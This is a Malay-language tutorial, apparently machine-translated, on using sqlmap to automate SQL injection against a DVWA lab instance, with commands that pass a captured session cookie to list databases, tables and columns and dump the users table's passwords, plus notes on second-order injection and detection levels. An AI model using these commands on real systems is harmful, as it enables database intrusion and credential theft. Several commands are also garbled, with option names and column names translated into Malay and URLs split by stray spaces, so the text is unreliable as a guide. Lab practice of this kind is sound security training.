Gunakan sqlmap untuk mengautomasikan suntikan ke dalam dvwa
Tetapkan aras dvwa kepada rendah
Buka dvwa’s SQL Injection (SQL Injection (Blind) ), buka penyahpepijatan pelayar, masukkan id pengguna dan serahkan untuk melihat permintaan yang dipintas.
Anda boleh melihat bahawa ia adalah permintaan GET, url "http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit #"
Mari letakkan terus ke dalam salmap untuk menguji, gunakan perintah -u -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id =1&Submit=Submit# "
Anda dapat melihat bahawa anda perlu log masuk di sini, jika tidak, anda tidak boleh kehabisan. Jadi kita perlu menambah kuki untuk mengekalkan log masuk
6. Gunakan proksi burp suite untuk menangkap paket, dapatkan kuki log masuk, tambah --dbs burst data -u "http :// 192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" -- cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" --dbs
Anda boleh melihat pangkalan data itu.> 7. Kami menggunakan -D xxx untuk menentukan pangkalan data untuk dilihat, dan menggunakan --tables untuk melihat semua jadual dalam pangkalan data: -u "http://192.168.1.222:8089/ vulnerabilities/sqli/?id=1&Submit= Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa --tablesLihat hasil yang sedang dijalankan:8>
-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id =1&Submit=Submit#" --cookie="PHPSESSID =0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users --columns
9. Kami menggunakan -D xxx untuk melihat pangkalan data, -T xxx menentukan jadual untuk dilihat dan -C xxx untuk melihat lajur jadual -dump Lihat data lajur
-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=. Hantar#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T pengguna -C kata laluan,pengguna --dump
>
-r 1.txt --url-second
"http://192.168.1.222:8089/vulnerabilities/sqli/" -- kelompok -- tahap 2
Nama teratas
-r 1.txt --url-second "http://192.168.1.222:8089/vulnerabilities/sqli/" - -batch --level 2 -D dvwa --tables
-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli /"
-- kelompok --tahap 2 -D dvwa -T pengguna --lajur
" http://192.168.1.222:8089/vulnerabilities/sqli /" -- kelompok --tahap 2 -D dvwa -T pengguna -C pengguna,kata laluan --buang
Beberapa isu konseptual:
Suntikan tertib kedua: Pesanan kedua
suntikan sql--tertib kedua Kadangkala apabila input data pada titik suntikan dikembalikan, hasilnya bukan halaman semasa, tetapi halaman lain Pada masa ini, anda perlu menentukan halaman mana untuk mendapatkan respons untuk menentukan sama ada ia benar atau salah. –url kedua diikuti dengan alamat URL halaman yang dikembalikan
--batch: konfigurasi lalai automatik, tidak perlu menekan ya atau tidak secara manual
tahap:Sqlmap mempunyai sejumlah 5 tahap pengesanan, lalainya ialah 1. Lebih tinggi tahap, lebih banyak muatan digunakan semasa pengesanan. Antaranya, tahap 5 mempunyai muatan paling banyak dan secara automatik akan memecahkan dan menyuntik tajuk seperti kuki dan XFF. Sudah tentu, semakin tinggi tahap, semakin perlahan masa pengesanan. Parameter ini akan mempengaruhi titik suntikan ujian dan data POST akan diuji kuki HTTP akan diuji apabila tahap 2. Pengepala Ejen Pengguna/Perujuk HTTP akan diuji apabila tahap 3. Apabila anda tidak pasti parameter mana yang merupakan titik suntikan, untuk memastikan ketepatan, adalah disyorkan untuk menetapkan tahap kepada 5 (kelajuan juga akan menjadi lebih perlahan)
Atas ialah kandungan terperinci Analisis sampel suntikan automatik Sqlmap. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!